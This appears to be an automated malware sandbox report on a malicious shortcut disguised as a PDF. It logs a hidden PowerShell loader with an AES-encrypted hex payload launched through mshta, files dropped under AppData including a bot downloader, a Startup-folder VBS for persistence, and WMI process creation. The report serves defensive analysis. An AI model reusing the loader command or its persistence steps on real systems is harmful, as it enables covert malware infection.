        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = 'CC0D32DBB8F2AEAAAD367283309458E20D13E54AE9F93C26DBBAD73293BD50A36D9574E1A9FCCBBE98A49FC7AA50C3C051F3CBAE9B99771F9B3471A8B7406647B45710656B9560F816F99C52E5CD056E94BB343C78DECD912750ECF5C120A3C6120F92F9AB407C779692B2B801886D4C1933853B818B2F4ACBF254531544A97C461534F8989BDBE763C47BD13A5027B3175BDB8C0BA73400B08CB34FF3383856710CB6019243D1C36B39D01C9442DBEB89528D749444614EA6F3A125CFDB0B5CB39EA903AD087683829FAE488C94736BC882DFA6F1B5BADE602DC13EA4A71F59C0C555E4AA6CC495A964CEE240BAC2F3D429AA98692B0BF989429E291DCF520A3167A6D7D554A48ED1EC98E1F71AA758670750C98404FB140B70E6F8CE88015D69E8D0F3FCF7F737F074F810905C0DD5FD37726F325B89CC02C3B0CD71DD28A101A9080999F615A7AF33942A1FEAF9033FFB3CB02D88C83CEA4BEB13D36CCCDE536D2D4EA38EA00E492838E3E78EE9C0CA9DBC405A5C6F049999533FD9F5FA7404801734E8378978546AAF5D84956D74F1C451D373B86F3488593922F15AEE13BA02471A9C112CEDF4833B3F0638A4A8CECD1D52E9714EA9EDEB5E32944EB33FE52FB8A4B556B1DA6183E48183ACE760AE01310141F680BF3D33446801FC2BFD3000C1BDD51A6E8F30AA8A9B5C8BFBB555A5C04AC12A81509772CE127CB8598C525EBA2A091166AA250CCC96785ABD72973ECED6924E22C09BD25C868452073029B96D7C754E3D74FDF15E08C2A0F4C53F93F39EC3F0FD965A188FDF13D042BBC47CF96138A70FAB9162E32734D3C137CC3A4D27DB5363F9FA5F59ECAC5ADF283B806C00431D7D240795F83F85010F571088B246CEEDC36DADA39641C871CCD8E775017B5A338D1D94E045C140E05F8F86DB296BFFD092C327B31BB3D19F8C1B5B5EFBFD54647ABB292A0F16D86139B074238F1AB2638E0A3034AC7C00056A6E988B63A360B70DCBCDFD1A98A7DE9D02F1760C98DEFEFD55748A81631DD8336CCBC8BDB9784FDC8ED2398FADF660B1349E919FD6497D31A84903C8649BB847B3734E51D3C9ABDFA5BBE03A6CA0E3EC6A9ABB6054F6EB3DE0B804173A9DFDFD85C03FBB3DD4CD7152D30D13AF80E4BC2D9D561DB494C445384AF14A71AF67A3F252F2BAB0EB8A399A9F3DE478EE0920E4F717E63A195E6394FFD001BEFEED37566A40C55DC5CF48EF42822AD3876834FF7F2C41AA52134D41CE152176D5FBC298F91AF4E5C2ADB1486720693646536D8308BF068787AEE0EED268732FA76B22C73A43EEC2E677B595D575F1EDD71FAEC18238660E9D88409FA932407116BB516B6340B888E6FF5C5E303826F793F4E87135C2D9D20886EB5FCFC42C0D9603B67C13BBE82488090447CE2D406BCE4F71F8DED1277FB46A3F2E9FEB147880DEF6AD74481A95C5A94D480FA6742D967332B49570E903748A0BC475D54F8A4C548412C4AE30767A66A97B5BCFEE2DCB02BD3B11FA82EA1D214EA6520580B2DDF1FACDAD83B1921E52658D688B42F0DC0F163134922A308D66702D2E0ABFC978ECCE276FD6423CFF201D4169303D1FEE518BF422FDA896E2625653444DDB524D1779473C3EF10919F817A39FEBE05CE776ACD3EEB5F6529FC14DA7797DC617900100111D543A4680515798A7EB47B4C3C8F79DA82C90F0A61ADCC29B3FFCB05F9F13ECC10A907A9F8FD908476EA00AAE8E8631736D715947485271496F5853536B744B';function wLh ($iUUDD){return -split ($iUUDD -replace '..', '0x$& ')};$feiFxp = wLh($ddg.SubString(0, 2464));$zXe = [System.Security.Cryptography.Aes]::Create();$zXe.Key = wLh($ddg.SubString(2464));$zXe.IV = New-Object byte[] 16;$QlaSHZgH = $zXe.CreateDecryptor();$PwiNROQ = [System.String]::new($QlaSHZgH.TransformFinalBlock($feiFxp, 0,$feiFxp.Leng
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = 'CC0D32DBB8F2AEAAAD367283309458E20D13E54AE9F93C26DBBAD73293BD50A36D9574E1A9FCCBBE98A49FC7AA50C3C051F3CBAE9B99771F9B3471A8B7406647B45710656B9560F816F99C52E5CD056E94BB343C78DECD912750ECF5C120A3C6120F92F9AB407C779692B2B801886D4C1933853B818B2F4ACBF254531544A97C461534F8989BDBE763C47BD13A5027B3175BDB8C0BA73400B08CB34FF3383856710CB6019243D1C36B39D01C9442DBEB89528D749444614EA6F3A125CFDB0B5CB39EA903AD087683829FAE488C94736BC882DFA6F1B5BADE602DC13EA4A71F59C0C555E4AA6CC495A964CEE240BAC2F3D429AA98692B0BF989429E291DCF520A3167A6D7D554A48ED1EC98E1F71AA758670750C98404FB140B70E6F8CE88015D69E8D0F3FCF7F737F074F810905C0DD5FD37726F325B89CC02C3B0CD71DD28A101A9080999F615A7AF33942A1FEAF9033FFB3CB02D88C83CEA4BEB13D36CCCDE536D2D4EA38EA00E492838E3E78EE9C0CA9DBC405A5C6F049999533FD9F5FA7404801734E8378978546AAF5D84956D74F1C451D373B86F3488593922F15AEE13BA02471A9C112CEDF4833B3F0638A4A8CECD1D52E9714EA9EDEB5E32944EB33FE52FB8A4B556B1DA6183E48183ACE760AE01310141F680BF3D33446801FC2BFD3000C1BDD51A6E8F30AA8A9B5C8BFBB555A5C04AC12A81509772CE127CB8598C525EBA2A091166AA250CCC96785ABD72973ECED6924E22C09BD25C868452073029B96D7C754E3D74FDF15E08C2A0F4C53F93F39EC3F0FD965A188FDF13D042BBC47CF96138A70FAB9162E32734D3C137CC3A4D27DB5363F9FA5F59ECAC5ADF283B806C00431D7D240795F83F85010F571088B246CEEDC36DADA39641C871CCD8E775017B5A338D1D94E045C140E05F8F86DB296BFFD092C327B31BB3D19F8C1B5B5EFBFD54647ABB292A0F16D86139B074238F1AB2638E0A3034AC7C00056A6E988B63A360B70DCBCDFD1A98A7DE9D02F1760C98DEFEFD55748A81631DD8336CCBC8BDB9784FDC8ED2398FADF660B1349E919FD6497D31A84903C8649BB847B3734E51D3C9ABDFA5BBE03A6CA0E3EC6A9ABB6054F6EB3DE0B804173A9DFDFD85C03FBB3DD4CD7152D30D13AF80E4BC2D9D561DB494C445384AF14A71AF67A3F252F2BAB0EB8A399A9F3DE478EE0920E4F717E63A195E6394FFD001BEFEED37566A40C55DC5CF48EF42822AD3876834FF7F2C41AA52134D41CE152176D5FBC298F91AF4E5C2ADB1486720693646536D8308BF068787AEE0EED268732FA76B22C73A43EEC2E677B595D575F1EDD71FAEC18238660E9D88409FA932407116BB516B6340B888E6FF5C5E303826F793F4E87135C2D9D20886EB5FCFC42C0D9603B67C13BBE82488090447CE2D406BCE4F71F8DED1277FB46A3F2E9FEB147880DEF6AD74481A95C5A94D480FA6742D967332B49570E903748A0BC475D54F8A4C548412C4AE30767A66A97B5BCFEE2DCB02BD3B11FA82EA1D214EA6520580B2DDF1FACDAD83B1921E52658D688B42F0DC0F163134922A308D66702D2E0ABFC978ECCE276FD6423CFF201D4169303D1FEE518BF422FDA896E2625653444DDB524D1779473C3EF10919F817A39FEBE05CE776ACD3EEB5F6529FC14DA7797DC617900100111D543A4680515798A7EB47B4C3C8F79DA82C90F0A61ADCC29B3FFCB05F9F13ECC10A907A9F8FD908476EA00AAE8E8631736D715947485271496F5853536B744B';function wLh ($iUUDD){return -split ($iUUDD -replace '..', '0x$& ')};$feiFxp = wLh($ddg.SubString(0, 2464));$zXe = [System.Security.Cryptography.Aes]::Create();$zXe.Key = wLh($ddg.SubString(2464));$zXe.IV = New-Object byte[] 16;$QlaSHZgH = $zXe.CreateDecryptor();$PwiNROQ = [System.String]::new($QlaSHZgH.TransformFinalBlock($feiFxp, 0,$feiFxp.LengJump to behavior
        Source: samm[1].5.drStatic PE information: 0xDD4C8E8E [Wed Aug 27 00:19:26 2087 UTC]
        Source: nghttp2.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x4241f
        Source: gmodule-2.dll.21.drStatic PE information: real checksum: 0x0 should be: 0xe558
        Source: libsqlite3.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x19ad5d
        Source: legacy.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x3251b
        Source: icuin71.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x2f03aa
        Source: libsodium.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x5529f
        Source: libssh2.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x65fd1
        Source: libsasl.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x3de7f
        Source: deplister.exe.21.drStatic PE information: real checksum: 0x0 should be: 0x2e96f
        Source: libpq.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x55808
        Source: samm[1].5.drStatic PE information: real checksum: 0x46055 should be: 0x16553c
        Source: libssl-3-x64.dll.21.drStatic PE information: real checksum: 0x0 should be: 0xc375a
        Source: libenchant2.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x17e60
        Source: libcrypto-3-x64.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x500978
        Source: php_bot_downloader_v2-AVERAGE-BOI-CLN.exe.7.drStatic PE information: real checksum: 0x0 should be: 0x491b5
        Source: icuuc71.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x22b2e9
        Source: glib-2.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x1890d7
        Source: libenchant2_hunspell.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x7d0e9
        Source: icuio71.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x1bdbd
        Source: php_bot_downloader_v2-AVERAGE-BOI-CLN.exe.7.drStatic PE information: section name: _RDATA
        Source: deplister.exe.21.drStatic PE information: section name: _RDATA
        Source: legacy.dll.21.drStatic PE information: section name: .00cfg
        Source: php_gd.dll.21.drStatic PE information: section name: .rodata
        Source: libcrypto-3-x64.dll.21.drStatic PE information: section name: .00cfg
        Source: libssh2.dll.21.drStatic PE information: section name: .00cfg
        Source: libssl-3-x64.dll.21.drStatic PE information: section name: .00cfg
        Source: nghttp2.dll.21.drStatic PE information: section name: .00cfg
        Source: vcruntime140.dll.21.drStatic PE information: section name: _RDATA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9AF92370 push eax; iretd 7_2_00007FFD9AF9237D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9AF95974 pushad ; retf 7_2_00007FFD9AF95979

        Persistence and Installation Behavior

        barindex
        Windows shortcut file (LNK) starts blacklisted processes
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
        Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Creates processes via WMI
        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\extras\ssl\legacy.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\deplister.exeJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_intl.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_mysqli.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php8apache2_4.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_xsl.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icudt71.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\vcruntime140.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libpq.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sysvshm.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_shmop.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_pgsql.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_enchant.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_openssl.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libsasl.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\glib-2.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_imap.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pgsql.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-cgi.exeJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icuio71.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php8phpdbg.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_odbc.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\phpdbg.exeJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\gmodule-2.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_oci.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libsodium.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_snmp.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.exeJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_bz2.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_tidy.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\nghttp2.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_firebird.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libsqlite3.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\lib\enchant\libenchant2_hunspell.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_com_dotnet.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_fileinfo.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libssl-3-x64.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_mbstring.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sockets.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_opcache.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icuuc71.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_oci8_19.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_exif.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_curl.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_zend_test.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_mysql.dllJump to dropped file
        Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\samm[1]Jump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libenchant2.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php8ts.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_gmp.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libssh2.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_sqlite.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_gettext.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_ffi.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_odbc.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_dl_test.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libcrypto-3-x64.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_dba.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_soap.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_gd.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_ftp.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sqlite3.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_zip.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sodium.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icuin71.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_ldap.dllJump to dropped file
        Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\samm[1]Jump to dropped file
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\license.txt
        Source: C:\Windows\System32\tar.exeFile created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\readme-redist-bins.txt

        Boot Survival

        barindex
        Drops VBS files to the startup folder
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbsJump to dropped file
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs

        Hooking and other Techniques for Hiding and Protection

        barindex
        Uses an obfuscated file name to hide its real file extension (double extension)
        Source: Possible double extension: pdf.lnkStatic PE information: HateSpeech2024_Summary.pdf.lnk.bin.lnk
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E2CBF4 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_00007FF658E2CBF4
        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
